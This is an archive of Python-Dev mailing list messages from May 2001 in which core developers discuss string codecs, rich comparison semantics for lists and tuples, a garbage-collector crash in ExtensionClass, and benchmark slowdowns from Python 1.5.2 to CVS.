From: mal at lemburg.com (M.-A. Lemburg)
Date: Wed, 16 May 2001 13:06:14 +0200
Subject: [Python-Dev] Easy codec access
References: <3B011CA8.9DDB4FC7@lemburg.com> <200105151635.LAA29530@cj20424-a.reston1.va.home.com> <m31yppo99f.fsf@atrus.jesus.cam.ac.uk>
Message-ID: <3B025F26.A625DE02@lemburg.com>

Michael Hudson wrote:
> 
> Guido van Rossum <guido at digicool.com> writes:
> 
> > > I've just checked in a set of patches which implement the new
> > > .decode() method along with a couple of useful codecs.
> >
> > Cool!
> 
> Indeed.  Good idea, Marc!

Thanks :-)
 
> This is a bit unfriendly though:
> 
> >>> "bobbins".encode("gzip")
> Traceback (most recent call last):
>   File "<stdin>", line 1, in ?
>   File "/usr/local/src/python/dist/build/Lib/encodings/__init__.py", line 59, in search_function
>     raise SystemError,\
> SystemError: module "encodings.gzip" failed to register
> 
> I thought SystemErrors shouldn't ever happen (isn't it what gets
> raised for an illegal opcode, for example?).

This is due to the zlib module not being installed. The reason
for the search function in encodings/__init__.py raising a
SystemError is that it did find a module named gzip, but this
module does not export the needed registration API getregentry().

Perhaps it should just raise a LookupError instead, though...
 
> > > To see just how easy it is to write codecs, please have
> > > a look at the string codecs I added in this patch (e.g.
> > > zlib_codec.py or hex_codec.py). I am pretty sure that there
> > > are a lot more useful things in the standard lib which could
> > > benefit from these easy-to-use interfaces.
> >
> > As an excercise, I added a quoted-printable codec.  It was easy
> > indeed!
> 
> urlencode would be nice.  Maybe re.escape, too.  html entities?
> That's probably a bigger can of worms, but
> 
> print "<p>%s</p>"%text.encode("html")
> 
> seems delightfully simpleminded.

Right. That's the idea... volunteers are welcome :-) 

There are lots of those little "escape this, encode that" tasks 
which could benefit from the codec machinery. The ones you
mention would certainly be good candidates. pickle and marshal
would also be a good to have wrapped as codecs.

-- 
Marc-Andre Lemburg
______________________________________________________________________
Company & Consulting:                           http://www.egenix.com/
Python Software:                        http://www.lemburg.com/python/


From mwh at python.net  Wed May 16 13:19:15 2001
From: mwh at python.net (Michael Hudson)
Date: 16 May 2001 12:19:15 +0100
Subject: [Python-Dev] Easy codec access
In-Reply-To: "M.-A. Lemburg"'s message of "Wed, 16 May 2001 13:06:14 +0200"
References: <3B011CA8.9DDB4FC7@lemburg.com> <200105151635.LAA29530@cj20424-a.reston1.va.home.com> <m31yppo99f.fsf@atrus.jesus.cam.ac.uk> <3B025F26.A625DE02@lemburg.com>
Message-ID: <m3y9rxmtho.fsf@atrus.jesus.cam.ac.uk>

"M.-A. Lemburg" <mal at lemburg.com> writes:

> > This is a bit unfriendly though:
> > 
> > >>> "bobbins".encode("gzip")
> > Traceback (most recent call last):
> >   File "<stdin>", line 1, in ?
> >   File "/usr/local/src/python/dist/build/Lib/encodings/__init__.py", line 59, in search_function
> >     raise SystemError,\
> > SystemError: module "encodings.gzip" failed to register
> > 
> > I thought SystemErrors shouldn't ever happen (isn't it what gets
> > raised for an illegal opcode, for example?).
> 
> This is due to the zlib module not being installed. 

No it's not, actually.  I *thought* I was getting the error message
because the zlib encoding doesn't alias itself to gzip (whether it
should or not is another question).  But in fact if you specify a
bogus encoding you get a nice error message:

>>> "bobbins".encode("nonesuch")
Traceback (most recent call last):
  File "<stdin>", line 1, in ?
LookupError: unknown encoding

but:

>>> "bobbins".encode("sys")
Traceback (most recent call last):
  File "<stdin>", line 1, in ?
  File "/usr/local/src/python/dist/build/Lib/encodings/__init__.py", line 59, in search_function
    raise SystemError,\
SystemError: module "encodings.sys" failed to register

I have to admit I don't really know what's going on here, but the
error is just confusing.

> The reason for the search function in encodings/__init__.py raising
> a SystemError is that it did find a module named gzip, but this
> module does not export the needed registration API getregentry().

Yep.  

> Perhaps it should just raise a LookupError instead, though...

Might be easiest.

> > urlencode would be nice.  Maybe re.escape, too.  html entities?
> > That's probably a bigger can of worms, but
> > 
> > print "<p>%s</p>"%text.encode("html")
> > 
> > seems delightfully simpleminded.
> 
> Right. That's the idea... volunteers are welcome :-) 

Maybe this evening.

> There are lots of those little "escape this, encode that" tasks 
> which could benefit from the codec machinery. The ones you
> mention would certainly be good candidates. pickle and marshal
> would also be a good to have wrapped as codecs.

Ooh yes, hadn't thought of them.

'YW5vdGhlci1mdW4tdG95\n'.decode("base64")-ly y'rs
M.

-- 
  There's an aura of unholy black magic about CLISP.  It works, but
  I have no idea how it does it.  I suspect there's a goat involved
  somewhere.                     -- Johann Hibschman, comp.lang.scheme


From aahz at rahul.net  Wed May 16 15:16:18 2001
From: aahz at rahul.net (Aahz Maruch)
Date: Wed, 16 May 2001 06:16:18 -0700 (PDT)
Subject: [Python-Dev] Comparison speed
In-Reply-To: <20010515222738.A9996@thyrsus.com> from "Eric S. Raymond" at May 15, 2001 10:27:38 PM
Message-ID: <20010516131618.C40CC99C91@waltz.rahul.net>

Eric S. Raymond wrote:
> 
> (Yes, I know some sexy lady Pythonistas.  No, you can't have their
> phone numbers.  Pthfthfthpht...)

That's okay, I have their e-mail addresses.  Wanna bet on which of us
gets a response first?
-- 
                      --- Aahz (@pobox.com)

Hugs and backrubs -- I break Rule 6       <*>       http://www.rahul.net/aahz/
Androgynous poly kinky vanilla queer het Pythonista

I don't really mind a person having the last whine, but I do mind
someone else having the last self-righteous whine.


From barry at digicool.com  Wed May 16 15:42:15 2001
From: barry at digicool.com (Barry A. Warsaw)
Date: Wed, 16 May 2001 09:42:15 -0400
Subject: [Python-Dev] Comparison speed
References: <15105.46090.203278.397835@anthem.wooz.org>
	<LNBBLJKPBEHFEDALKOLCAEHPKCAA.tim.one@home.com>
Message-ID: <15106.33719.14403.13051@anthem.wooz.org>

>>>>> "TP" == Tim Peters <tim.one at home.com> writes:

    TP> Random clue: when you're too lazy to try to subtact out loop
    TP> overhead (not a knock, I am too), you may have better luck
    TP> with

    TP>     r = [1] * 1000000

    TP> than

    TP>     r = range(1000000)

Ah, good point!


From guido at digicool.com  Wed May 16 17:01:40 2001
From: guido at digicool.com (Guido van Rossum)
Date: Wed, 16 May 2001 10:01:40 -0500
Subject: [Python-Dev] Comparison speed
In-Reply-To: Your message of "Wed, 16 May 2001 09:28:45 +0200."
             <200105160728.f4G7SjK01766@mira.informatik.hu-berlin.de> 
References: <LNBBLJKPBEHFEDALKOLCAEEMKCAA.tim.one@home.com> <200105152059.f4FKxuI03903@mira.informatik.hu-berlin.de> <200105152241.RAA00926@cj20424-a.reston1.va.home.com> <15105.26334.610144.846269@slothrop.digicool.com>  
            <200105160728.f4G7SjK01766@mira.informatik.hu-berlin.de> 
Message-ID: <200105161501.KAA02226@cj20424-a.reston1.va.home.com>

> Marc-Andre once proposed a type representing the immediate supertype
> of both byte strings and unicode strings; let's call it abstract string.
> Then I could write isinstance(e, types.AbstractString).

This will probably be doable in 2.2.

--Guido van Rossum (home page: http://www.python.org/~guido/)


From guido at digicool.com  Wed May 16 17:24:55 2001
From: guido at digicool.com (Guido van Rossum)
Date: Wed, 16 May 2001 10:24:55 -0500
Subject: [Python-Dev] Re: [Python-checkins] CVS: python/dist/src/Objects tupleobject.c,2.48,2.49
In-Reply-To: Your message of "Tue, 15 May 2001 20:01:05 -0400."
             <LNBBLJKPBEHFEDALKOLCGEGMKCAA.tim.one@home.com> 
References: <LNBBLJKPBEHFEDALKOLCGEGMKCAA.tim.one@home.com> 
Message-ID: <200105161524.KAA02518@cj20424-a.reston1.va.home.com>

> The question remaining is how much of this list/tuple richcmp behavior is
> guaranteed by the language and how much is just implementation-dependent
> fuzz.

Unclear what you're asking.  The language doesn't require any
particular semantics for sequence comparisons, but the language of
course includes the tuple and list squence types, and it describes
(albeing lacking some rigorous detail) what comparisons for those do.
If there are specific lacks of detail, it probably helps to think
about filling those in.

> For a more vanilla example, I removed the EQ/NE "lengths differ?"
> tuple richcmp early-exit test because I never found code that made
> it trigger. (but tons of code that gets there without triggering).
> But this has semantic implications too: an implementation without
> the early exit may call user-defined comparison routines that raise
> exceptions when comparing tuples of different lengths now.  Do you
> care?  (I don't.)

I don't care about exceptions either in this case; the shortcut seems
fair game.

--Guido van Rossum (home page: http://www.python.org/~guido/)


From skip at pobox.com  Wed May 16 16:28:04 2001
From: skip at pobox.com (skip at pobox.com)
Date: Wed, 16 May 2001 09:28:04 -0500
Subject: [Python-Dev] Easy codec access
In-Reply-To: <3B025F26.A625DE02@lemburg.com>
References: <3B011CA8.9DDB4FC7@lemburg.com>
	<200105151635.LAA29530@cj20424-a.reston1.va.home.com>
	<m31yppo99f.fsf@atrus.jesus.cam.ac.uk>
	<3B025F26.A625DE02@lemburg.com>
Message-ID: <15106.36468.62292.611515@beluga.mojam.com>

    mal> pickle and marshal would also be a good to have wrapped as codecs.

Why?  They operate on much more than strings.

-- 
Skip Montanaro (skip at pobox.com)
(847)971-7098


From fredrik at effbot.org  Wed May 16 17:07:18 2001
From: fredrik at effbot.org (Fredrik Lundh)
Date: Wed, 16 May 2001 17:07:18 +0200
Subject: [Python-Dev] Easy codec access
References: <3B011CA8.9DDB4FC7@lemburg.com><200105151635.LAA29530@cj20424-a.reston1.va.home.com><m31yppo99f.fsf@atrus.jesus.cam.ac.uk><3B025F26.A625DE02@lemburg.com> <15106.36468.62292.611515@beluga.mojam.com>
Message-ID: <002101c0de19$e7875a90$e46940d5@hagrid>

skip wrote:

>     mal> pickle and marshal would also be a good to have wrapped as codecs.
> 
> Why?  They operate on much more than strings.

hypergeneralization, of course.

more candidates:

    "10".decode("int")
    "10.0".decode("float")
    "[1, 2, 3]".decode("list")
    "readme.txt".decode("file")
    "SyntaxError".decode("raise")
    (etc)

Cheers /F


From nas at python.ca  Wed May 16 18:19:42 2001
From: nas at python.ca (Neil Schemenauer)
Date: Wed, 16 May 2001 09:19:42 -0700
Subject: [Python-Dev] GC and ExtensionClass
In-Reply-To: <200105141940.f4EJeLJ05032@mira.informatik.hu-berlin.de>; from martin@loewis.home.cs.tu-berlin.de on Mon, May 14, 2001 at 09:40:21PM +0200
References: <200105121916.f4CJGwQ01423@mira.informatik.hu-berlin.de> <200105122108.QAA09951@cj20424-a.reston1.va.home.com> <200105122232.f4CMWAi02765@mira.informatik.hu-berlin.de> <15103.65486.61021.328424@beluga.mojam.com> <200105141940.f4EJeLJ05032@mira.informatik.hu-berlin.de>
Message-ID: <20010516091942.A16455@glacier.fnational.com>

Martin v. Loewis wrote:
> In any case, I think you need to analyse this in a debugger.

#7  0x080bc17e in tupletraverse (o=0x8154914, visit=0x807d640 <visit_decref>, 
    arg=0x0) at ../Objects/tupleobject.c:366
366                             err = visit(x, arg);
(gdb) p *o
$11 = {ob_refcnt = 1, ob_type = 0x80eb5a0, ob_size = 1, ob_item = {0x402c5180}}
(gdb) p *o->ob_item[0]
$12 = {ob_refcnt = 2, ob_type = 0x0}

In other words the GC is finding a tuple object that contains an
element with a funny looking address (data segment?) and an
op_type of NULL.  The collector has started running from here:

#10 0x0807debc in collect_generations () at ../Modules/gcmodule.c:467
#11 0x0807dfc4 in _PyGC_Insert (op=0x819f57c) at ../Modules/gcmodule.c:507
#12 0x080af56a in PyDict_New () at ../Objects/dictobject.c:149
#13 0x0808d8b8 in getBaseDictionary (type=0x402bcc40)
    at /home/skip/src/pygtk2-SNAP-20010408/ExtensionClass.c:1249
#14 0x0808eb45 in initializeBaseExtensionClass (self=0x402bcc40)
    at /home/skip/src/pygtk2-SNAP-20010408/ExtensionClass.c:1495
#15 0x08095fb1 in export_subclassed_type (dict=0x81851fc, 
    name=0x402a9388 "GdkDragContext", typ=0x402bcc40, bases=0x816fc34)
    at /home/skip/src/pygtk2-SNAP-20010408/ExtensionClass.c:3451
#16 0x400194ac in pygobject_register_class (dict=0x81851fc, 
    class_name=0x402a9388 "GdkDragContext", 
    get_type=0x404d5c50 <gdk_drag_context_get_type>, ec=0x402bcc40, 
    bases=0x816fc34) at gobjectmodule.c:202
#17 0x402a55fd in pygtk_register_classes (d=0x81851fc) at gtk.c:31844
#18 0x40257004 in init_gtk () at gtkmodule.c:98

I don't have time to dig deeper into this right now but perhaps
this will help someone.

  Neil


From mal at lemburg.com  Wed May 16 18:24:57 2001
From: mal at lemburg.com (M.-A. Lemburg)
Date: Wed, 16 May 2001 18:24:57 +0200
Subject: [Python-Dev] Easy codec access
References: <3B011CA8.9DDB4FC7@lemburg.com><200105151635.LAA29530@cj20424-a.reston1.va.home.com><m31yppo99f.fsf@atrus.jesus.cam.ac.uk><3B025F26.A625DE02@lemburg.com> <15106.36468.62292.611515@beluga.mojam.com> <002101c0de19$e7875a90$e46940d5@hagrid>
Message-ID: <3B02A9D9.113836D6@lemburg.com>

Fredrik Lundh wrote:
> 
> skip wrote:
> 
> >     mal> pickle and marshal would also be a good to have wrapped as codecs.
> >
> > Why?  They operate on much more than strings.

Of course. 

Still their basic task is to take an object and
encode in some way for dumps() and do the reverse for loads().
That's pretty much what codecs normally do ;-)

I wasn't referring to the use of pickle and marshal with string.encode()
and .decode(); even though you could then decode a pickle using
"pickledata".decode("pickle") and get back the object.

These two are very useful though when it comes to using codecs
for file wrappers:

f = codecs.open('mypicklfile', mode='wb', encoding='pickle')
f.write((123, 'abc', 456.789))
f.close()

f = codecs.open('mypicklfile', mode='rb', encoding='pickle')
t = f.read()
f.close()

> hypergeneralization, of course.
> 
> more candidates:
> 
>     "10".decode("int")
>     "10.0".decode("float")
>     "[1, 2, 3]".decode("list")
>     "readme.txt".decode("file")
>     "SyntaxError".decode("raise")
>     (etc)

You forgot the most important one ;-) ...

	"print 'My first Python program'".decode("python").run()

-- 
Marc-Andre Lemburg
______________________________________________________________________
Company & Consulting:                           http://www.egenix.com/
Python Software:                        http://www.lemburg.com/python/


From skip at pobox.com  Wed May 16 19:44:15 2001
From: skip at pobox.com (skip at pobox.com)
Date: Wed, 16 May 2001 12:44:15 -0500
Subject: [Python-Dev] Easy codec access
In-Reply-To: <3B02A9D9.113836D6@lemburg.com>
References: <3B011CA8.9DDB4FC7@lemburg.com>
	<200105151635.LAA29530@cj20424-a.reston1.va.home.com>
	<m31yppo99f.fsf@atrus.jesus.cam.ac.uk>
	<3B025F26.A625DE02@lemburg.com>
	<15106.36468.62292.611515@beluga.mojam.com>
	<002101c0de19$e7875a90$e46940d5@hagrid>
	<3B02A9D9.113836D6@lemburg.com>
Message-ID: <15106.48239.813965.579600@beluga.mojam.com>

    mal> Still their basic task is to take an object and encode in some way
    mal> for dumps() and do the reverse for loads().  That's pretty much
    mal> what codecs normally do ;-)

Yes, I see that.  The conceptual problem I have is that in all previous
examples I've seen here they have taken as input and returned as outputs
only strings or unicode objects.

    mal> These two are very useful though when it comes to using codecs
    mal> for file wrappers:

This use I missed.  Thanks for the explanation.

Skip


From mal at lemburg.com  Wed May 16 20:33:44 2001
From: mal at lemburg.com (M.-A. Lemburg)
Date: Wed, 16 May 2001 20:33:44 +0200
Subject: [Python-Dev] Performance compares
Message-ID: <3B02C808.E3354D3F@lemburg.com>

After having read a little into the comparison thread, I tried
some performance compares on my own: the one between
the current CVS version and Python 1.5.2.

Both versions were compiled on the same Linux machine, using the
same GCC compiler and optimization settings.

Here are the results from pybench 0.9 and pystone; some of the
figures show quite dramatic slow-downs. I'm not sure where they
result from, but they do concern me a bit, since the upgrade
path from 1.5.2 is probably the most common one to be expected
in user-land.

Since it is possible that these figures result from my specific 
machine setup, I'd like to know what other people see on their
machines.

Thanks.
--

Python 1.5.2:
Pystone(1.1) time for 10000 passes = 3.26
This machine benchmarks at 3067.48 pystones/second

Python CVS:
Pystone(1.1) time for 10000 passes = 4.43
This machine benchmarks at 2257.34 pystones/second

--

PYBENCH 0.9

Benchmark: /home/lemburg/tmp/pybench-cvs-O.pyb (rounds=10, warp=20)

Tests:                              per run    per oper.    diff *)
------------------------------------------------------------------------
          BuiltinFunctionCalls:    1152.60 ms    9.04 us   +64.70%
           BuiltinMethodLookup:     903.90 ms    1.72 us          
                 CompareFloats:     908.30 ms    2.02 us   +40.94%
         CompareFloatsIntegers:    1276.25 ms    2.84 us   +37.15%
               CompareIntegers:    1075.50 ms    1.19 us   +21.09%
                  CompareLongs:     989.40 ms    2.20 us   +47.12%
                CompareStrings:     844.80 ms    2.25 us   +33.99%
                CompareUnicode:    1018.65 ms    2.72 us       n/a
                 ConcatStrings:    1226.30 ms    8.18 us   +92.56%
                 ConcatUnicode:    1575.40 ms   10.50 us       n/a
               CreateInstances:    2094.05 ms   49.86 us  +101.86%
       CreateStringsWithConcat:    1515.75 ms    7.58 us  +111.67%
       CreateUnicodeWithConcat:    1833.85 ms    9.17 us       n/a
                  DictCreation:    2795.30 ms   18.64 us  +203.34%
             DictWithFloatKeys:    2285.70 ms    3.81 us   +18.73%
           DictWithIntegerKeys:    1444.65 ms    2.41 us   +58.53%
            DictWithStringKeys:    1262.60 ms    2.10 us   +52.83%
                      ForLoops:     989.95 ms   99.00 us   -10.01%
                    IfThenElse:    1232.45 ms    1.83 us   +23.25%
                   ListSlicing:     621.40 ms  177.54 us          
                NestedForLoops:     986.60 ms    2.82 us   +52.09%
          NormalClassAttribute:    1231.15 ms    2.05 us   +36.70%
       NormalInstanceAttribute:    1114.15 ms    1.86 us   +27.11%
           PythonFunctionCalls:    1251.25 ms    7.58 us   +46.09%
             PythonMethodCalls:    1034.35 ms   13.79 us   +42.19%
                     Recursion:     922.15 ms   73.77 us   +36.76%
                  SecondImport:    1055.45 ms   42.22 us  +100.47%
           SecondPackageImport:    1061.35 ms   42.45 us   +96.31%
         SecondSubmoduleImport:    1292.35 ms   51.69 us   +77.89%
       SimpleComplexArithmetic:    1748.00 ms    7.95 us  +120.97%
        SimpleDictManipulation:    1172.85 ms    3.91 us   +47.85%
         SimpleFloatArithmetic:     881.25 ms    1.60 us   +12.30%
      SimpleIntFloatArithmetic:     833.80 ms    1.26 us          
       SimpleIntegerArithmetic:     839.00 ms    1.27 us          
        SimpleListManipulation:    1252.60 ms    4.64 us   +69.37%
          SimpleLongArithmetic:    1360.65 ms    8.25 us  +100.43%
                    SmallLists:    2380.05 ms    9.33 us  +116.72%
                   SmallTuples:    1793.80 ms    7.47 us  +101.52%
         SpecialClassAttribute:    1257.35 ms    2.10 us   +37.91%
      SpecialInstanceAttribute:    1340.25 ms    2.23 us   +21.13%
                StringMappings:    1601.50 ms   12.71 us       n/a
              StringPredicates:    1059.70 ms    3.78 us       n/a
                 StringSlicing:    1235.90 ms    7.06 us   +98.32%
                     TryExcept:    1272.55 ms    0.85 us   +28.39%
                TryRaiseExcept:    1383.45 ms   92.23 us   +77.48%
                  TupleSlicing:    1163.05 ms   11.08 us   +75.29%
               UnicodeMappings:    1232.80 ms   68.49 us       n/a
             UnicodePredicates:    1294.95 ms    5.76 us       n/a
             UnicodeProperties:    1410.45 ms    7.05 us       n/a
                UnicodeSlicing:    1296.80 ms    7.41 us       n/a
------------------------------------------------------------------------
            Average round time:   73388.00 ms                  n/a

*) measured against: /home/lemburg/tmp/pybench-1.5.2-O.pyb (rounds=10, warp=20)

(The compares not shown are below noise level (+-10%))

-- 
Marc-Andre Lemburg
______________________________________________________________________
Company & Consulting:                           http://www.egenix.com/
Python Software:                        http://www.lemburg.com/python/


From tim.one at home.com  Wed May 16 21:07:49 2001
From: tim.one at home.com (Tim Peters)
Date: Wed, 16 May 2001 15:07:49 -0400
Subject: [Python-Dev] Re: [Python-checkins] CVS: python/dist/src/Objects tupleobject.c,2.48,2.49
In-Reply-To: <200105161524.KAA02518@cj20424-a.reston1.va.home.com>
Message-ID: <LNBBLJKPBEHFEDALKOLCOEJIKCAA.tim.one@home.com>

[Tim]
> The question remaining is how much of this list/tuple richcmp behavior is
> guaranteed by the language and how much is just implementation-dependent
> fuzz.

[Guido]
> Unclear what you're asking.  The language doesn't require any
> particular semantics for sequence comparisons, but the language of
> course includes the tuple and list squence types, and it describes
> (albeing lacking some rigorous detail) what comparisons for those do.

The current

    Tuples and lists are compared lexicographically using comparison
    of corresponding items.

was quite clear in a cmp-only world.  In a richcmp world, "compared
lexicographically" is fuzzy enough that different implementations may do
different things in good faith, competent users may disagree about what it
means in specific cases, and programs may yield different results across
implementations (or random CVS patches <wink>).

> If there are specific lacks of detail, it probably helps to think
> about filling those in.

The *level* of additional detail intended is the cutoff between what's
guaranteed by the language and what's left up to the implementation.

The full truth before was relatively simple.  For a pair x, y of lists or
tuples,

def __cmp__(x, y):  # pretending this is a method on lists and tuples
    i = 0
    while i < len(x) and i < len(y):
        c = cmp(x[i], y[i])
        if c:
            return c
        i += 1
    return cmp(len(x), len(y))

was *almost* the entire tale, incl. that lengths were re-fetched on each
iteration.  What's left unexplained is the treatment of recursive lists, and
so the result of comparing them is a prime suspect for different behavior
across implementations and releases.

In a richcmp world, there are several additional ways in which the above
fails to capture the full truth, and each of those ways is another prime
suspect for surprises.

For example, I believe it's *intended* that:

1. Element comparisons continue to be strictly left-to-right, and
   that no element comparisons are to be performed after the leftmost
   element comparison that settles the issue (if any).

2. tuple/list comparison via == or != must use only == comparison on
   elements, and that implementations are allowed (but not required)
   to skip all element comparisons when == or != comparison is given
   lists/tuples of different sizes.

OTOH, I doubt (but don't know) it's intended that all implementations must
emulate other semantically significant details of the current implementation,
like:

1. <=, <, > and >= comparisons will do at most one element comparison
   that is not an == comparison.

2. Whenever a <, <=, > or >= element comparison is needed, the long-
   winded details of how that works, incl. but not limited to the
   specific "first try ==, then try <, then try >" strategy used to
   simulate a pre-richcmp cmp() when all else fails.

Going back to the original example:

>>> class C:
...     def __lt__(x, y): return 1
...     __eq__ = __lt__
...
>>> a, b = C(), C()
>>> a < b       #1
1
>>> [a] < [b]   #2
0
>>> cmp(a, b)   #3
0
>>> a > b       #4
1
>>> a == b      #5
1
>>> a != b      #6
1
>>>

Which of those results are *required* by the language, and which merely
*allowed*?

+ I believe #1, #4 and #5 are required.

+ I have no idea whether to call it "a bug" if the #2 and/or #3
  and/or #6 results differed, e.g., under Jython, or under
  CPython 2.3.  Indeed, I'm not even sure why #6 returns 1 under
  CPython today, and I've been staring at this a lot lately <wink>
  ... OK, #6 ends up getting resolved by comparing object
  addresses, which leaves "required or not?" fuzzy (i.e., *must*
  it be resolved that way?  or is it implementation-defined?).


From guido at digicool.com  Wed May 16 22:35:46 2001
From: guido at digicool.com (Guido van Rossum)
Date: Wed, 16 May 2001 15:35:46 -0500
Subject: [Python-Dev] Rich comparison of lists and tuples
In-Reply-To: Your message of "Wed, 16 May 2001 15:07:49 -0400."
             <LNBBLJKPBEHFEDALKOLCOEJIKCAA.tim.one@home.com> 
References: <LNBBLJKPBEHFEDALKOLCOEJIKCAA.tim.one@home.com> 
Message-ID: <200105162035.PAA04299@cj20424-a.reston1.va.home.com>

[Subject fixed]

[Tim shows there's a lot left to the imagination when trying to glean
the meaning of list1==list2 using rich comparisons.]

I would like to break this down by defining the mapping between cmp()
and rich comparisons.

I propose:

- If cmp() is requested but not defined, and rich comparisons are
  defined, try ==, <, > in order; if all three yield false, act as if
  rich comparisons were not defined, and use the fallback comparison
  (i.e. by address).

- If a rich comparison is requested but not defined, use cmp() and use
  the obvious mapping.

- Continue to define the comparison of unequal sequences in terms of
  cmp().

- Testing == or != for sequences takes these shortcuts:

  1. if the lengths differ, the sequences differ

  2. compare the elements using == until a false return is found

Note that this defines 'x!=y' as 'not x==y' for sequences.  We could
easily go the extra mile and define != to use only != on the items;
but is this worth the extra complexity?

--Guido van Rossum (home page: http://www.python.org/~guido/)


From skip at pobox.com  Wed May 16 22:37:43 2001
From: skip at pobox.com (skip at pobox.com)
Date: Wed, 16 May 2001 15:37:43 -0500
Subject: [Python-Dev] GC and ExtensionClass
In-Reply-To: <20010516091942.A16455@glacier.fnational.com>
References: <200105121916.f4CJGwQ01423@mira.informatik.hu-berlin.de>
	<200105122108.QAA09951@cj20424-a.reston1.va.home.com>
	<200105122232.f4CMWAi02765@mira.informatik.hu-berlin.de>
	<15103.65486.61021.328424@beluga.mojam.com>
	<200105141940.f4EJeLJ05032@mira.informatik.hu-berlin.de>
	<20010516091942.A16455@glacier.fnational.com>
Message-ID: <15106.58647.495143.164636@beluga.mojam.com>

    Neil> In other words the GC is finding a tuple object that contains an
    Neil> element with a funny looking address (data segment?) and an
    Neil> op_type of NULL. 

Neil,

I'm not sure if the funny looking address is a red herring or the key to the
crime.  I tried running with a breakpoint set in getBaseDictionary.  The
first couple times, the type parameter looked like

    $26 = (PyExtensionClass *) 0x80e7f60
    $27 = {ob_refcnt = 2, ob_type = 0x80e7f60, ob_size = 0, 
      tp_name = 0x80d7138 "ExtensionClass", ...}

    $28 = (PyExtensionClass *) 0x80e8060
    $29 = {ob_refcnt = 1, ob_type = 0x80e7f60, ob_size = 0, 
      tp_name = 0x80d7209 "Base", ...}

The third time it looked like

    $30 = (PyExtensionClass *) 0x4019f120
    $31 = {ob_refcnt = 1, ob_type = 0x80e7f60, ob_size = 0, 
      tp_name = 0x4019dab2 "GObject", ...}

The difference between the first two calls and the third one is that the
first two objects are defined in ExtensionClass.o, which I currently
statically link into the interpreter.  The Gtk/GObject stuff is dynamically
loaded into the running executable, so it's not surprising that it winds up
at a wildly different address than the ExtensionClass stuff.  My current
best guess is that whatever object the tuple is referring to is declared
static in the dynamically loaded Gtk stuff and has no business getting
reclaimed by the collector.  Sounds like a missing Py_INCREF somewhere.

At the earliest point I've been able to check that object so far, its
ob_type field is NULL.

Skip


From cpr at emsoftware.com  Thu May 17 00:24:15 2001
From: cpr at emsoftware.com (Chris Ryland)
Date: Wed, 16 May 2001 18:24:15 -0400
Subject: [Python-Dev] FYI: MIT's dynamic language design panel now online
Message-ID: <00f201c0de57$03042c20$6901a8c0@EM2>

This talk is most entertaining! Highly recommended to you good folk, if only
as a reinforcement of the good design principles embodied in Python (with
the exception of print >> ;-).

Jonathan Rees (an old Scheme/T hand) kept referring to Python whenever he
wanted to give an example of a modern dynamic language (disclaiming a lot of
knowledge about it). He mentioned it three or four times (usually
positively), so it must be on the tip of his mind.
--
Cheers!
Chris Ryland
Em Software, Inc.
www.emsoftware.com


From greg at cosc.canterbury.ac.nz  Thu May 17 03:49:31 2001
From: greg at cosc.canterbury.ac.nz (Greg Ewing)
Date: Thu, 17 May 2001 13:49:31 +1200 (NZST)
Subject: [Python-Dev] Easy codec access
In-Reply-To: <3B02A9D9.113836D6@lemburg.com>
Message-ID: <200105170149.NAA18480@s454.cosc.canterbury.ac.nz>

"M.-A. Lemburg" <mal at lemburg.com>:

> You forgot the most important one ;-) ...
>
>	"print 'My first Python program'".decode("python").run()

Surely that should be:

   "'My first Python program'.encode('stdout')".decode("python").decode("run")

Greg Ewing, Computer Science Dept, +--------------------------------------+
University of Canterbury,	   | A citizen of NewZealandCorp, a	  |
Christchurch, New Zealand	   | wholly-owned subsidiary of USA Inc.  |
greg at cosc.canterbury.ac.nz	   +--------------------------------------+


From tim.one at home.com  Thu May 17 03:56:56 2001
From: tim.one at home.com (Tim Peters)
Date: Wed, 16 May 2001 21:56:56 -0400
Subject: [Python-Dev] Comparison speed
In-Reply-To: <200105160802.f4G821s02180@mira.informatik.hu-berlin.de>
Message-ID: <LNBBLJKPBEHFEDALKOLCGEKMKCAA.tim.one@home.com>

[Martin v. Loewis]
> I'll put a patch on SF soon which does what you want to do, i.e. tries
> tp_compare as the first thing if tp_richcompare is not there.

Thanks!  I'll check it out.

> Even with this patch, your code is faster if strings have a
> richcompare.

OK, from what I understand, that makes no sense.  Does it to you?  Assuming
you're still talking about my silly little

     "ab" < "cd"

test, then all the new code you put into your richcompare slot was a waste of
cycles for that specific case:  the new richcmp "objects the same type?" test
would fail, then the new "pointers equal?" test would fail, then the new "op
== Py_EQ?" test would fail, and then richcompare would give up and call
string_compare() anyway.  So I'm either missing something fundamental about
what you did, or it's a timing anomaly on your box that defies obvious
explanation ("but if I add three new tests that don't pay off, and make an
extra call, then it's faster!").

> Without richcompare, I get
>
> 0.720
> 0.720
> 0.720
> 0.730
> 0.720
> 0.720
> 0.730
> 0.720
> 0.720
> 0.730
>
> With it, I get
>
> 0.710
> 0.720
> 0.720
> 0.710
> 0.710
> 0.720
> 0.710
> 0.710
> 0.710
> 0.720

See above.

> Given that stock CVS python is in the 0.78 range, the different is
> neglectable, though.

Oh, I don't like giving up that easy on things that make no sense --
something else is happening here, although I've no idea what.


From tim.one at home.com  Thu May 17 04:17:37 2001
From: tim.one at home.com (Tim Peters)
Date: Wed, 16 May 2001 22:17:37 -0400
Subject: [Python-Dev] Performance compares
In-Reply-To: <3B02C808.E3354D3F@lemburg.com>
Message-ID: <LNBBLJKPBEHFEDALKOLCCEKNKCAA.tim.one@home.com>

[MAL]
> Since it is possible that these figures result from my specific
> machine setup, I'd like to know what other people see on their
> machines.

Is this the same machine where you were able to get 15% difference a few
years ago by adding or removing an unreachable printf in ceval.c (or was that
Vladimir)?  If so, I bet it's degenerated to random 50% difference since then
<wink>.

My Win98SE box is *astonishingly* useless for timings.  Without fail, the
first time I run pystone after a reboot yields a result a solid 50% higher
than the second or subsequent times I run it (yes, it's major-league *slower*
the second time).  This is true across dozens of trials over several months,
and across all versions of Python.

And simple little loops routinely vary in reported runtime by a factor of 3.
I may have to dig my old Win95 box out of the packing crate <0.6 wink>.

None of that changes, of course, that the numbers you got are scary.


From jeremy at digicool.com  Thu May 17 00:37:47 2001
From: jeremy at digicool.com (Jeremy Hylton)
Date: Wed, 16 May 2001 18:37:47 -0400 (EDT)
Subject: [Python-Dev] Performance compares
In-Reply-To: <3B02C808.E3354D3F@lemburg.com>
References: <3B02C808.E3354D3F@lemburg.com>
Message-ID: <15107.315.19349.268345@slothrop.digicool.com>

As usual, the results you're reporting are quite different than what I
see on my machine.  I'd like to think that my machine is more normal
than yours, but I expect we're both oddballs <0.2 wink>.  I see
basically the same slowdowns that you see, but the amount of the
slowdown is quite a bit smaller.

